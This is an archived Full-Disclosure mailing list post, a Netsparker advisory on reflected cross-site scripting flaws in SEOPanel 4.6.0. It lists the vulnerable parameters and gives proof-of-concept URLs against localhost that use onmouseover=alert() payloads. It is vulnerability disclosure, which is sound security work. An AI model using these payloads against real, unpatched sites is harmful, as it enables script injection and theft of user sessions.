| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAKD6+R6buZNnRV+yazBaqu-oQ1LVA8ioS45xOBU-TaO6p4STVg@mail.gmail.com> Date: Mon, 28 Dec 2020 15:19:54 +0100 From: Daniel Bishtawi via Fulldisclosure <fulldisclosure@...lists.org> To: fulldisclosure@...lists.org, vuln@...unia.com, bugs@...uritytracker.com, submissions@...ketstormsecurity.org Subject: [FD] Cross-Site Scripting Vulnerabilities in SEOPanel 4.6.0 Hello, We are informing you about Cross-Site Scripting Vulnerabilities in SEOPanel 4.6.0. Information -------------------- Advisory by Netsparker Name: Cross-Site Scripting Vulnerabilities in SEOPanel Affected Software: SEOPanel Affected Versions: 4.6.0 Vendor Homepage: https://www.seopanel.org/ Vulnerability Type: Cross-Site Scripting Severity: Important Status: Fixed CVSS Score (3.0): 7.4 (High) Netsparker Advisory Reference: NS-20-005 Technical Details -------------------- SEO Panel root was at http://localhost:8080 Cross-site Scripting in Directories.php URL: http://localhost:8080/directories.php?capcheck=%27%22%20ns%3dnetsparker(0x00E4E5)%20&dir_name=&langcode=&pagerank=&sec=directorymgr&stscheck=1 Parameter Name: capcheck Parameter Type: GET Attack: '" ns=netsparker(0x00E4E5) Proof URL: http://localhost:8080/directories.php?capcheck=%27%22%20onmouseover%3dalert(0x00E4E5)%20&dir_name=&langcode=&pagerank=&sec=directorymgr&stscheck=1 Cross-site Scripting in seo-plugins-manager.php (5) URL: http://localhost:8080/seo-plugins-manager.php/seo-plugins-manager.php?keyword=&pageno=3&stscheck=%27%22%20ns%3dnetsparker(0x01434E)%20 Parameter Name: stscheck Parameter Type: GET Attack: '" ns=netsparker(0x01434E) Proof URL: http://localhost:8080/seo-plugins-manager.php/seo-plugins-manager.php?keyword=&pageno=3&stscheck=%27%22%20onmouseover%3dalert(0x01434E)%20 URL: http://localhost:8080/seo-plugins-manager.php?keyword=&pageno=3&stscheck=%27%22%20ns%3dnetsparker(0x00E492)%20 Parameter Name: stscheck Parameter Type: GET Attack: ''" ns=netsparker(0x00E492) Proof URL: http://localhost:8080/seo-plugins-manager.php?keyword=&pageno=3&stscheck=%27%22%20onmouseover%3dalert(0x00E492)%20 URL: http://localhost:8080/seo-plugins-manager.php/seo-plugins-manager.php?pageno=%27%22%20ns%3dnetsparker(0x011A0C)%20&pid=1&sec=listinfo Parameter Name: pageno Parameter Type: GET Attack: ''" ns=netsparker(0x011A0C) Proof URL: http://localhost:8080/seo-plugins-manager.php/seo-plugins-manager.php?pageno=%27%22%20onmouseover%3dalert(0x011A0C)%20&pid=1&sec=listinfo URL: http://localhost:8080/seo-plugins-manager.php?keyword=&pageno=%27%22%20ns%3dnetsparker(0x01B8AB)%20&pid=1&sec=listinfo&stscheck=select Parameter Name: pageno Parameter Type: GET Attack: '" ns=netsparker(0x01B8AB) Proof URL: http://localhost:8080/seo-plugins-manager.php?keyword=&pageno=%27%22%20onmouseover%3dalert(0x01B8AB)%20&pid=1&sec=listinfo&stscheck=select URL: http://localhost:8080/seo-plugins-manager.php?pageno=%27%22%20ns%3dnetsparker(0x00DC5E)%20&pid=1&sec=listinfo Parameter Name: pageno Parameter Type: GET Attack: ''" ns=netsparker(0x00DC5E) Proof URL: http://localhost:8080/seo-plugins-manager.php?pageno=%27%22%20onmouseover%3dalert(0x00DC5E)%20&pid=1&sec=listinfo For more information: https://www.netsparker.com/web-applications-advisories/ns-20-005-cross-site-scripting-in-seopanel/ Regards, [image: upload image] Daniel Bishtawi | Marketing Administrator E: daniel.bishtawi@...sparker.com <daniel.bishtawi@...sparker.com> _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists